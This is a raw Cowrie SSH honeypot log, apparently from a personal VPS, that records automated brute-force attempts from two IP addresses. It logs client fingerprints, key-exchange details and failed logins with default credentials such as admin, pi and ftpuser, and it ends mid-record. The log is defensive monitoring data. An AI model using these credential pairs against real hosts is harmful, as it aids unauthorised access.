{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.785146Z","src_ip":"212.227.125.160","session":"3d856c52f27d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:57.829263Z","src_ip":"212.227.125.160","session":"76a0866f079e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:58.331574Z","src_ip":"212.227.125.160","session":"f05dbfb09e69"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.332309Z","src_ip":"212.227.125.160","session":"f05dbfb09e69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53086,"dst_ip":"1.2.3.4","dst_port":22,"session":"83216e44d84a","protocol":"ssh","message":"New connection: 212.227.125.160:53086 (1.2.3.4:22) [session: 83216e44d84a]","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.334858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.335649Z","src_ip":"212.227.125.160","session":"83216e44d84a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.377295Z","src_ip":"212.227.125.160","session":"1c15d77b5cee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47712,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dc18b7b4893","protocol":"ssh","message":"New connection: 212.227.125.160:47712 (1.2.3.4:22) [session: 4dc18b7b4893]","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.419125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.420018Z","src_ip":"212.227.125.160","session":"4dc18b7b4893"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567890","message":"login attempt [admin/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.421177Z","src_ip":"212.227.125.160","session":"3d856c52f27d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.609687Z","src_ip":"212.227.125.160","session":"aeb757b8e4f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47726,"dst_ip":"1.2.3.4","dst_port":22,"session":"c60de789a584","protocol":"ssh","message":"New connection: 212.227.125.160:47726 (1.2.3.4:22) [session: c60de789a584]","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.707610Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.756087Z","src_ip":"212.227.125.160","session":"a73a943e54d5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.784404Z","src_ip":"212.227.125.160","session":"c60de789a584"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.785085Z","src_ip":"212.227.125.160","session":"c60de789a584"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47738,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1581d7fc4b7","protocol":"ssh","message":"New connection: 212.227.125.160:47738 (1.2.3.4:22) [session: a1581d7fc4b7]","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.822082Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.917385Z","src_ip":"212.227.125.160","session":"6b1073578e24"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.923858Z","src_ip":"212.227.125.160","session":"a1581d7fc4b7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:58.925043Z","src_ip":"212.227.125.160","session":"a1581d7fc4b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47744,"dst_ip":"1.2.3.4","dst_port":22,"session":"c06d31a3347f","protocol":"ssh","message":"New connection: 212.227.125.160:47744 (1.2.3.4:22) [session: c06d31a3347f]","sensor":"my-vps","timestamp":"2025-08-31T07:06:59.065397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:59.499917Z","src_ip":"212.227.125.160","session":"c06d31a3347f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:59.501051Z","src_ip":"212.227.125.160","session":"c06d31a3347f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:59.553173Z","src_ip":"212.227.125.160","session":"f05dbfb09e69"}
{"eventid":"cowrie.session.closed","duration":"11.8","message":"Connection lost after 11.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:59.554305Z","src_ip":"212.227.125.160","session":"f05dbfb09e69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47410,"dst_ip":"1.2.3.4","dst_port":22,"session":"a49d7cadce44","protocol":"ssh","message":"New connection: 212.227.235.229:47410 (1.2.3.4:22) [session: a49d7cadce44]","sensor":"my-vps","timestamp":"2025-08-31T07:06:59.569685Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:00.200072Z","src_ip":"212.227.125.160","session":"3d856c52f27d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47756,"dst_ip":"1.2.3.4","dst_port":22,"session":"4abac4e1d200","protocol":"ssh","message":"New connection: 212.227.125.160:47756 (1.2.3.4:22) [session: 4abac4e1d200]","sensor":"my-vps","timestamp":"2025-08-31T07:07:00.265191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:00.373536Z","src_ip":"212.227.235.229","session":"a49d7cadce44"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:07:00.374474Z","src_ip":"212.227.235.229","session":"a49d7cadce44"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567890","message":"login attempt [pi/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:00.593477Z","src_ip":"212.227.125.160","session":"c60de789a584"}
{"eventid":"cowrie.login.failed","username":"student","password":"cancel","message":"login attempt [student/cancel] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:00.651485Z","src_ip":"212.227.125.160","session":"a1581d7fc4b7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:00.707993Z","src_ip":"212.227.125.160","session":"4abac4e1d200"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:00.708720Z","src_ip":"212.227.125.160","session":"4abac4e1d200"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"cancel","message":"login attempt [ftpuser/cancel] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.079387Z","src_ip":"212.227.125.160","session":"c06d31a3347f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cancel","message":"login attempt [admin/cancel] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.354779Z","src_ip":"212.227.125.160","session":"4abac4e1d200"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.637975Z","src_ip":"212.227.125.160","session":"c60de789a584"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47766,"dst_ip":"1.2.3.4","dst_port":22,"session":"a36a6d6f6f6e","protocol":"ssh","message":"New connection: 212.227.125.160:47766 (1.2.3.4:22) [session: a36a6d6f6f6e]","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.681462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.682347Z","src_ip":"212.227.125.160","session":"a36a6d6f6f6e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.695193Z","src_ip":"212.227.125.160","session":"a1581d7fc4b7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.726441Z","src_ip":"212.227.125.160","session":"a36a6d6f6f6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47782,"dst_ip":"1.2.3.4","dst_port":22,"session":"572f7dda2421","protocol":"ssh","message":"New connection: 212.227.125.160:47782 (1.2.3.4:22) [session: 572f7dda2421]","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.736956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.738067Z","src_ip":"212.227.125.160","session":"572f7dda2421"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.781008Z","src_ip":"212.227.125.160","session":"572f7dda2421"}
{"eventid":"cowrie.login.failed","username":"pi","password":"cancel","message":"login attempt [pi/cancel] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.863360Z","src_ip":"212.227.125.160","session":"a36a6d6f6f6e"}
{"eventid":"cowrie.login.failed","username":"student","password":"87654321","message":"login attempt [student/87654321] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:01.912143Z","src_ip":"212.227.125.160","session":"572f7dda2421"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.123927Z","src_ip":"212.227.125.160","session":"c06d31a3347f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47794,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcd44f30667b","protocol":"ssh","message":"New connection: 212.227.125.160:47794 (1.2.3.4:22) [session: bcd44f30667b]","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.166229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.167056Z","src_ip":"212.227.125.160","session":"bcd44f30667b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.209932Z","src_ip":"212.227.125.160","session":"bcd44f30667b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"87654321","message":"login attempt [ftpuser/87654321] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.339526Z","src_ip":"212.227.125.160","session":"bcd44f30667b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.399763Z","src_ip":"212.227.125.160","session":"4abac4e1d200"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47798,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce67224f68d6","protocol":"ssh","message":"New connection: 212.227.125.160:47798 (1.2.3.4:22) [session: ce67224f68d6]","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.442447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.444594Z","src_ip":"212.227.125.160","session":"ce67224f68d6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ss